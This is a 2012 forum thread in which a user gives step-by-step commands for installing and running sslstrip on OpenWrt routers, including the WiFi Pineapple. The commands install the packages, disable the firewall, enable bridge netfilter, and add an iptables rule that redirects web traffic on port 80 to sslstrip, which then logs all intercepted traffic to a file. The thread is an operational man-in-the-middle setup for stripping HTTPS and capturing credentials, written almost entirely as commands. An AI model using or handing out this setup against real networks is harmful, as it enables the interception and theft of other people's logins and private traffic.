thaihenry Posted June 19, 2012 Share Posted June 19, 2012 (edited) This is a guide on how to get sslstrip working on openwrt. This should work on ANY router that supports openwrt with USB ports and 32 MB of memory or more. A fast CPU would help, however sslstrip runs fine on 400 mgz CPU. I have tested this on the pineapple mark 4 and on the tplink WR703N 1. Make sure you install a firmware with a version 3.0 or greater kernel. At this time only the development snapshots (firmware) of openwrt have linux 3.3 iptables may not be properly supported on earlier versions. 2. Install USB support, this is very well documented elsewhere on this site 3. edit /etc/profile vi /etc/profile a. Change the existing path statement to the following: export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/opt/bin:/opt/sbin:/opt/usr/bin:/opt/usr/sbin b. Add this line: export LD_LIBRARY_PATH=/lib:/usr/lib:/opt/lib:/opt/usr/lib 4. edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!) change the 0 to 1 in the following section: vi /etc/sysctl.conf # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 5. Disable the firewall using the command line or web interface. (or modify iptables for proper routing) 6. Install the following packages: opkg -dest usb install python opkg -dest usb install zope-interface opkg -dest usb install twisted-web opkg -dest usb install pyopenssl Optional but very usefull: opkg -dest usb install nano opkg -dest usb install screen -dest usb may be different on your router depending on how you setup your usb disk and swap. Don't forget to add dest usb /usb in your software configuration. 7 Download sslstrip: wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.6.tar.gz tar zxvf sslstrip-0.6.tar.gz cd sslstrip-0.6 8. Fixes to get sslstrip working properly: ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7 touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py Optional for nano and screen: ln -s /usb/usr/share/terminfo /usr/share/terminfo 9. to get sslstrip running: iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 python sslstrip.py -a -k -f -w /usb/log.txt Once you have everything working properly, you can install sslstrip as usual (python setup.py install) so that you can use your favorite scripts on openwrt. Edited June 19, 2012 by thaihenry Quote Link to comment Share on other sites More sharing options...
thaihenry Posted June 19, 2012 Author Share Posted June 19, 2012 (edited) For existing users of the Pineapple that want to get sslstrip working properly: 1. edit /etc/sysctl.conf (otherwise port redirect to port 10000 will not work!) change the 0 to 1 in the following section: vi /etc/sysctl.conf # disable bridge firewalling by default net.bridge.bridge-nf-call-arptables=1 net.bridge.bridge-nf-call-ip6tables=1 net.bridge.bridge-nf-call-iptables=1 2. Depending on what version you have make sure that the firewall is disabled. 3. Install the following packages in case they were never installed: opkg -dest usb install python opkg -dest usb install zope-interface opkg -dest usb install twisted-web opkg -dest usb install pyopenssl If you want to get the latest version of sslstrip: 4. Download sslstrip: wget http://www.thoughtcr...trip-0.6.tar.gz tar zxvf sslstrip-0.6.tar.gz cd sslstrip-0.6 5. Fixes to get sslstrip working properly: ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7 touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py 6. If you are using the sslstrip module then you will need to install sslstrip: python setup.py install otherwise you can just run it from the command line: iptables --table nat --append PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 python sslstrip.py -a -k -f -w /usb/log.txt Edited June 19, 2012 by thaihenry Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.